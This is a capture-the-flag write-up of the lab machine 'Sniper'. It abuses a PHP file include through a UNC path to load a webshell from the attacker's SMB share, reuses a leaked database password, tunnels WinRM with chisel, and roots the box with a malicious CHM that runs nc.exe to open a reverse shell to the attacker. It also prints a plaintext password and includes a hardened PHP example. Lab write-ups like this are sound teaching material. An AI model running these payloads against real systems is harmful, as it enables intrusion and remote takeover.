Sniper - 10.10.10.151
Difficulty score: 6
28 Mar 2020. Write-up by Entr0phy (@Entr0phy)
USER
We start with an Nmap scan with service enumeration:
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  msrpc         Microsoft Windows RPC
So the services actually exposed are SMB and a web application. Let's inspect the web app first.
It looks like the website of a delivery company, and it also has a blog page. Interesting. The URL of the blog is even more interesting: the language is selected through a lang parameter :)
Apparently that parameter is used to include a local file. Let's try with a file that is readable on practically every Windows install:
http://10.10.10.151/blog/?lang=\users\public\desktop\desktop.ini
We can read it, so the parameter is a file include we can abuse. Because the target is Windows, the include can also point at a UNC path, so let's make the web server fetch a file from our own SMB server. First add a share to our Samba config (smb.conf):
[sniper]
    path = YOUR_SMB_FOLDER
    browseable = yes
    read only = no
    guest ok = yes
    create mask = 777
Make sure the shared folder and every file in it really have 777 permissions and that guest access is allowed, otherwise this won't work: it is the web server process on the target, not us, that reads the files. Then restart the services:
systemctl restart smbd
systemctl restart nmbd
I placed a webshell called index.php in the shared folder and included it through the same parameter, with a UNC path instead of a local one: http://10.10.10.151/blog/?lang=\\10.10.14.5\sniper\index.php
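To make clear what is going on server-side, here is an added example (not Sniper's source, which we never see) of the kind of language-switch include that behaves like /blog/?lang=, next to a hardened version. The lang directory, the file names and the helper names are assumptions for illustration. The point worth remembering is that on Windows PHP resolves \\host\share\file.php as an ordinary filesystem path, so this attack does not depend on allow_url_include or allow_url_fopen:

```php
<?php
// Added example, not the original Sniper code: a reconstruction of an
// include driven by ?lang=, plus a fixed version. Paths are assumed.

// --- Vulnerable: the request parameter goes straight into include() ---
// Local files (\users\public\desktop\desktop.ini) are read and shown,
// and a UNC path (\\10.10.14.5\sniper\index.php) is fetched over SMB by
// the OS and executed as PHP. No URL wrapper is involved, so the
// allow_url_include setting does not protect against this.
function render_language_vulnerable(string $lang): void
{
    include $lang;
}

// --- Hardened: the untrusted value is only ever used as a lookup key ---
const LANG_DIR   = __DIR__ . '/lang/';   // assumed layout
const LANG_FILES = [
    'en' => 'en.php',
    'it' => 'it.php',
];

function render_language_safe($lang): bool
{
    if (!is_string($lang) || !array_key_exists($lang, LANG_FILES)) {
        return false;                    // unknown key: never touch the filesystem
    }
    $base   = realpath(LANG_DIR);
    $target = realpath(LANG_DIR . LANG_FILES[$lang]);
    // Belt and braces: the resolved file must still live under LANG_DIR,
    // so a stray symlink cannot turn this back into a traversal.
    if ($base === false || $target === false || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $target;
    return true;
}

$lang = $_GET['lang'] ?? 'en';
if (!render_language_safe($lang)) {
    http_response_code(400);
    echo 'unsupported language';
}
```

The hardened version never builds a path out of request data: the attacker can only pick among keys we defined, and the realpath() check catches the case where the lang directory itself has been tampered with.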
Enumerating a bit, we find an interesting file, db.php, under C:\inetpub\wwwroot\user\. Reading it gives us some credentials :)
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
    echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
Since net user doesn't seem to work from the webshell, to discover the usernames we have to look under C:\Users, where the only other user is Chris.
The database password is reused: it works for Chris over SMB :)
smbclient -L 10.10.10.151 -U Chris
Enter WORKGROUP\Chris's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available
Unfortunately there is nothing useful in the shares for getting a proper foothold on the box. Checking netstat, though, I noticed that WinRM (port 5985) is listening; it did not show up in the Nmap scan, so it is only reachable from the box itself :D
So let's pivot with chisel! I had to put the chisel.exe binary on the SMB share to be able to run it from the webshell, of course.
on your pentest box:
chisel server -p 8000 --reverse
from the webshell:
\\YOUR_IP\sniper\chisel_windows_amd64.exe client YOUR_IP:8000 R:5985:127.0.0.1:5985
Then just use evil-winrm, or a small Ruby script like the one below, to connect to WinRM on the forwarded local port with those credentials and you are in :)
# needs the winrm gem (gem install winrm)
require 'winrm'

# WinRM is reached through the chisel reverse forward on 127.0.0.1:5985
conn = WinRM::Connection.new(
  endpoint: 'http://127.0.0.1:5985/wsman',
  user: 'Chris',
  password: '36mEAhz/B8xQ~2VM'
)

command = ""
conn.shell(:powershell) do |shell|
  # minimal interactive loop: print a prompt, read a line, run it, until "exit"
  until command == "exit\n" do
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
ROOT
Normal enumeration doesn't highlight anything interesting, so let's dig for custom/user files around the system. The first one is Instruction.chm under C:\Users\Chris\Downloads. Converting it to PDF shows the following content:
Sniper Android App Documentation Table of Contents Pff... This dumb CEO always makes me do all the shitty work. SMH! I'm never completing this thing. Gonna leave this place next week. Hope someone snipes him.
This looks like a hint to me. Another one is under C:\Docs\note.txt:
Hi Chris, Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it. Regards, Sniper CEO.
It says to actually drop the documentation there, and the other file we found was a CHM. Suspicious: whoever plays the CEO is going to open whatever CHM lands in C:\Docs. Google gave me the answer soon enough:
https://gist.github.com/mgeeky/cce31c8602a144d8f2172a73d510e0e7
https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1
So log into our Windows VM, install HTML Help Workshop and get the Out-CHM.ps1 script, then run the following commands:
Import-Module .\Out-CHM.ps1
Out-CHM -Payload "\\\\YOUR_IP\\sniper\\nc.exe YOUR_IP 443 -e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Copy the produced CHM into the C:\Docs folder (nc.exe has to be on the SMB share, since the payload pulls it from there), keep a listener on port 443 and wait for the reverse shell :)
And we rooted Sn1p3r!